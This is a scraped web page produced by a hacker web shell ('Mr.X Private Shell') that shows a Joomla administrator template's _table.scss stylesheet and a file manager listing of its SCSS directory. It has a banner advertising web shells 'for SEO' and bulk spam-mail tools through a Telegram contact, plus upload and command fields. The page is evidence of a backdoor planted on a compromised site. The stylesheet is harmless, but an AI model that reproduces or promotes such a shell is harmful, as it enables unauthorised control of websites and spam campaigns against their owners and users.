__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
// Table

.table {

  > :not(caption) > * > * {
    color: var(--body-color);
  }

  thead {
    th {
      font-size: $label-font-size;
    }

    th,
    td {
      white-space: nowrap;

      .sysinfo & {
        white-space: normal;
      }
    }

    a {
      font-weight: $table-link-font-weight;
      color: rgb(var(--link-color-rgb, $table-link-color));
      &:hover {
        color: rgb(var(--link-color-rgb-hvr));
      }

      &#sorted {
        font-weight: $table-link-font-weight-sorted; /* $medium-weight */

        // This is the same as the bootstrap line because when it's sorted we want to undo the style
        color: var(--table-color-state, var(--table-color-type,var(--table-color)));
      }
    }

    .actions,
    .actions-th1 {
      @include media-breakpoint-down(md) {
        width: 28%;
      }
    }
  }

  tbody {
    tr {
      &:hover,
      &:focus,
      &:active {
        background-color: $table-hover-bg;
      }

      &:last-of-type {
        th,
        td {
          border-bottom: 0;
        }
      }
    }

    .itemnumber a.btn,
    .itemnumber span.btn {
      padding: .1rem .5rem;
      text-decoration: none;
    }

    th {
      font-weight: $medium-weight;
    }

    a:not(.badge):not(.btn):not(.dropdown-item) {
      font-weight: $table-link-font-weight;
      color: rgb(var(--link-color-rgb, $table-link-color));
      text-decoration: underline;
      &:hover {
        color: rgb(var(--link-color-rgb-hvr));
      }
    }

    .badge.bg-info {
      background-color: $badge-bg-info !important;
    }
  }

  th,
  td {
    label {
      margin-bottom: 0;
    }

    .inactive [class^="#{$jicon-css-prefix}-"],
    .inactive [class*=" #{$jicon-css-prefix}-"],
    .inactive [class^="#{$fa-css-prefix}-"],
    .inactive [class*=" #{$fa-css-prefix}-"] {
      color: $gray-400;
    }
  }

  .j-main-container > & {
    box-shadow: var(--atum-box-shadow);
  }
}

@if $enable-dark-mode {
  @include color-mode(dark) {
    .j-main-container .table {
      overflow: hidden;
      border: 1px solid rgba(255, 255, 255, .1);
      box-shadow: 1px 1px 2px rgba(0, 0, 0, .3);

      tr {
        &:hover {
          background: rgba(0, 0, 0, .1);
        }
      }
    }
  }
}

Filemanager

Name Type Size Permission Actions
_accordion.scss File 197 B 0664
_badge.scss File 154 B 0664
_buttons.scss File 2.49 KB 0664
_card.scss File 812 B 0664
_collapse.scss File 644 B 0664
_custom-forms.scss File 1.62 KB 0664
_dropdown.scss File 1.83 KB 0664
_form.scss File 1.55 KB 0664
_list-group.scss File 824 B 0664
_lists.scss File 66 B 0664
_modal.scss File 1.02 KB 0664
_pagination.scss File 183 B 0664
_reboot.scss File 203 B 0664
_table.scss File 2.19 KB 0664
Filemanager